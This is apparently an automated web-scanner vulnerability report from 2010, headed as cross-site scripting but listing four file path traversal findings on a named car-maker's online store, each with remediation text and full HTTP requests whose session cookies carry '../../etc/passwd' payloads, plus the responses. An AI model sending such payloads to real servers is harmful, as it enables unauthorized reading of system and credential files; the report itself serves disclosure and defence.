Report generated by Hoyt LLC Research at Thu Sep 30 18:19:43 CDT 2010.

Cross Site Scripting Reports | Hoyt LLC Research

1.1. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 [pgid cookie]

1.2. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch [sid cookie]

1.3. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View [sid cookie]

1.4. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch [sid cookie]

1. File path traversal
There are 4 instances of this issue:

/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 [pgid cookie]
/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch [sid cookie]
/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View [sid cookie]
/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch [sid cookie]

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defense can be employed to prevent path traversal attacks:

User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the applicationís input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.

1.1. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 [pgid cookie] next

Summary

Severity:	High
Confidence:	Firm
Host:	https://store.fiat.com
Path:	/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388

Issue detail

The pgid cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA was submitted in the pgid cookie. The requested file was returned in the application's response.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:45:29 GMT
Server: Apache
Content-Length: 29361
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

1.2. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch [sid cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://store.fiat.com
Path:	/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch

Issue detail

The sid cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd was submitted in the sid cookie. The requested file was returned in the application's response.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:47:40 GMT
Server: Apache
Content-Length: 20744
Set-Cookie: sid=OCoio7cYBSUro_u9PVYgIx_YIKMQXWo2NFpZ-rDccps_-sxBP-46KoXm; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000C5o6fUep; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

1.3. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View [sid cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://store.fiat.com
Path:	/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View

Issue detail

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:47:37 GMT
Server: Apache
Content-Length: 20724
Set-Cookie: sid=tOz-GIUf5fzyGMm6sZX8mC3frGXM5lgxuJyFQYLb_l3jQZ2WhhLmkbfh; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx00009Q176fd0; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

1.4. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch [sid cookie] previous

Summary

Severity:	High
Confidence:	Firm
Host:	https://store.fiat.com
Path:	/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch

Issue detail

Request

POST /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch HTTP/1.1
Host: store.fiat.com
Connection: keep-alive
Referer: https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388?JumpTarget=ViewRequisitionCheckout-ManageAddresses&=&=&=
Cache-Control: max-age=0
Origin: https://store.fiat.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; SelectedLocaleID=en_GB; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.6.10.1285881681; CICMR=1920x1200
Content-Length: 583

InvoiceToAddressForm_Title=Herr&InvoiceToAddressForm_FirstName=&InvoiceToAddressForm_SecondName=&InvoiceToAddressForm_LastName=&InvoiceToAddressForm_Company=&InvoiceToAddressForm_Street=&InvoiceToAddr
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 30 Sep 2010 22:27:14 GMT
Server: Apache
Content-Length: 20824
Set-Cookie: sid=3OXpOuOTyc3sOq820ifruktTxGzbxD690JWSY-RXllT0Y_sa7hvxs9Ft; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000CxrOZMYj; path=/
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

Report generated by Hoyt LLC Research at Thu Sep 30 18:19:43 CDT 2010.